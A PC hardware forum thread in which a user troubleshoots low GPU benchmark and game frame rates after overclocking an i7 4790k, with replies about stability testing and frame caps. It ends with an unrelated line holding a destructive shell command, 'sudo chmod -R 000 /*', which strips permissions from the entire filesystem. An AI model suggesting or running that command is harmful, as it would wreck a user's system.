hi, i just built my new computer, i ran cinebench and heaven benchmarks and got around 140 for cinebench and 55-75 for heaven(cant remember). i just overclocked my cpu to 4.6 GHz at 1.325V now my GPU isnt working properly. i got 59.89 on cinebench at first i thought it was capped at 60fps, but then i ran heaven and it is staying below 50fps through out, anyone got any ideas??

specs:

CPU: i7 4790k

Motherboard: Asus SABERTOOTH Z97 MARK 1, Intel Z97, Socket 1150, Motherboard

RAM: HyperX FURY Series 8GB (2x 4GB) DDR3 1866MHz CL10 DIMM Memory Module Kit – White

GPU: MSI GTX 780

Cooler: Corsair H100i

PSU: Corsair RM 750

windows 8.1 64 bit

thanks for any help :)

May be the CPU is pushed too far lower to 4.5GHz @ 1.23V, and try Prime95 first, it's stability issue i think

well temps are fine, but more importantly i want into the bios and and reset to defaults and its still doing it so i dont think its because of the overclock. also i did run prime 95 for about 8 hours

Do you notice any difference when you're running actual games?

skyrim and payday 2 im capped at 60, and in gta 4 i seam to be capped at 50 when i turn the settings down to the minimum i still only get 50. i havent downloaded any really gpu intensive games yet as i just built it. im starting to think i have a weird capping bug

Did you have those issues before overclocking? If you lower the overclock do you get better results? Have you changed the core clock of the cpu?

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
